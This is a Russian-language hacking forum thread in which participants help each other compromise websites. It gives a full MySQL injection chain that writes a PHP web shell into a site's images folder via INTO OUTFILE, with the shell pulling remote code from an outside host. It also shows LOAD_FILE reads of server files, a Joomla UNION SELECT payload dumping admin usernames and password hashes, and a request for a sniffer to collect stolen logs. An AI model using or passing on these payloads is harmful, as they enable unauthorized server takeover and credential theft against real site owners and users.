Ну правильно, чо это за пусть такой, ты же не "../etc/passwd" подбираешь, тут надо писать реальный абсолютный путь к папке с правами на запись
to R1dex, странно вроде есть такая Попробую еще... to Pashkela, да я полный пишу, просто скрыл путь, что бы не палиццо (поправил верхний пост) Еще вопрос, полный путь у меня такой: /var/www/vhosts/название сайта/httpdocs/ то есть в INTO OUTFILE так и пишем /var/www/vhosts/название сайта/httpdocs/images/shell.php при условии, что папка images имеет нужные нам права. ?
Octave_Parango Запрос покажи полностью. Права есть? Вообще ошибка , как уже сказал R1dex, говорит об несуществующей дирректории. Именно путь, а не права, или что то ещё, но запрос давай посмотрим на всякий случай
to jokester, запрос такой: CREATE TABLE `she` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `she` ( `shl` ) VALUES ('<?php include("http://название сайте/shell.txt") ?>'); SELECT `shl` FROM `she` INTO OUTFILE `/var/www/vhosts/название сайта/httpdocs/images/shell.php`; DROP TABLE `she` Где-то накосячил? Да?
.htaccess ни имеет никакого отношения. По возврашаемому коду ошибки ясно что такой диры нет, что бы убедиться в этом попробуй LOAD_FILE какой нибудь файл из этой директории. Кстати у тебя file_priv есть?
2 Octave_Parango .htaccess подгрузи да и разберись, так ли оно, как Pashkela сказал... 2 AkyHa_MaTaTa имхо, не факт, могут всякие извращения стоять...
Не вижу никакой связи между .htaccess и работой с локальной файловой системой посредством MySQL, если только что разве проверить есть ли такая дириктория посредством загрузки .htaccess из той дириктории, хотя в большинстве случаев именно к .htaccess у MySQL узера нет прав на доступ, легчше подгрузить какую нибудь картинку из /images/.
Если читается, но не пишется - резонно предположить, что каталог не доступен для записи из под того юзера под кем работает процесс mysql.
Не думаю, при таком раскладе помоему будет выкидывать Errcode: 13 , а у него Errcode: 2, а это несуществующая дира, элементарный косяк в написании пути даст такую-же ошибку Octave_Parango Чтение ты как осуществлял?
2 AkyHa_MaTaTa ты прав, я просто на первоначальный вопрос внимания не обратил... думал мало ли, вдруг он записанные файлы через веб хотел просмотреть...
У меня маленький вопрос по joomla, как узнать какие узеры являються админами, то есть например я выбераю узеров -1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3A,username,password),10,11,12,13,14+from+jos_users+limit+3,1/* как узнать какие из них админы, по +where+gid=25 ?
Подскажите плз рабочий онлайн сниффер, раньше юзал na-s.ru но сейчас там чтото странное на сайте творится. Нужен сниффер с авторизацией, чтобы кто попало не видел мои логи...
